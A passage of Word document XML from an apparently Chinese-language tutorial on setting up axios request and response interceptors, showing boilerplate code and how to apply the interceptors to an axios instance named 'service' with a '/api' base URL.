          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>对请求错误做些什么</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8959A8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="F5871F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.reject(error);</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>添加响应拦截器</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>axios.interceptors.response.use(</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8959A8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4271AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="F5871F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4271AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>对响应数据做点什么</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8959A8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> response;</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">  }, </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8959A8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4271AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="F5871F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4271AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8E908C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>对响应错误做点什么</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="8959A8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="F5871F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.reject(error);</w:t>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00614497">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="4D4D4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54525D3C" w14:textId="77777777" w:rsidR="00641158" w:rsidRPr="00614497" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CFBA7C" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A321246" w14:textId="3DA88593" w:rsidR="00641158" w:rsidRDefault="006E5D70" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应拦截器：</w:t>
      </w:r>
      <w:r w:rsidR="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r w:rsidR="0038137E">
        <w:t>.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF3B836" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B33D992" w14:textId="75D25A56" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网源码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是我们此处已经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了，所以改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519906A8" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import axios from "axios"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1443A" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C3662C" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const service = axios.create({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A337EA1" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    baseURL: "/api",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D9565" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A9124C" w14:textId="77777777" w:rsidR="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2F8F7B" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>添加请求拦截器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA0190D" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>service.interceptors.request.use(function (config) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEE10D7" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在发送请求之前做些什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E08F187" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return config;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6826B7AF" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  }, function (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3061A74A" w14:textId="77777777" w:rsidR="0038137E" w:rsidRPr="0038137E" w:rsidRDefault="0038137E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r w:rsidRPr="0038137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对请求错误做些什么</w:t>
      </w:r>
    </w:p>
